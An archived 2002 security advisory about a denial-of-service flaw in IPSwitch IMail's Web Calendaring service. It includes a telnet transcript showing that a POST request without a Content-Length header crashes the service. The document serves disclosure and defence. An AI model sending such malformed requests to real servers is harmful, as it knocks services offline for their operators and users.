Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: web5581.htm

IMail Web Calendaring service crash using malformed POST request



31th Jul 2002 [SBWID-5581]
COMMAND

	IMail Web Calendaring service crash using malformed POST request

SYSTEMS AFFECTED

	IPSwitch IMail, All Current Versions

PROBLEM

	In 2c79cbe14ac7d0b8472d3f129fa1df55 Security Advisory #6:
	

	the IMail Web Calendaring service, iwebcal, can be crashed by issuing  a
	malformed POST request.. specifically one that  neglects  to  include  a
	"Content-Length:" parameter
	

	

	xxx@xx:~$ telnet 192.168.0.2 8484

	Trying 192.168.0.2...

	Connected to 192.168.0.2.

	Escape character is '^]'.

	POST / HTTP/1.0

	

	Connection closed by foreign host.

	

	

	[the iwebcal service has crashed]
	

	

	xxx@xx:~$ telnet 192.168.0.2 8484

	Trying 192.168.0.2...

	telnet: connect to address 192.168.0.2: Connection refused

	

	

	#EXPLOITATION
	

	this is pretty obvious, it's a simple DoS.. and it looks  as  if  remote
	code execution is not possible due to the  nature  of  this  programming
	error
	

	

SOLUTION

	#PATCH
	

	sorry, no backdoors this time.. disable the service before someone  else
	does? or wait for a vendor patch after a few hoaxes are debunked..
	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH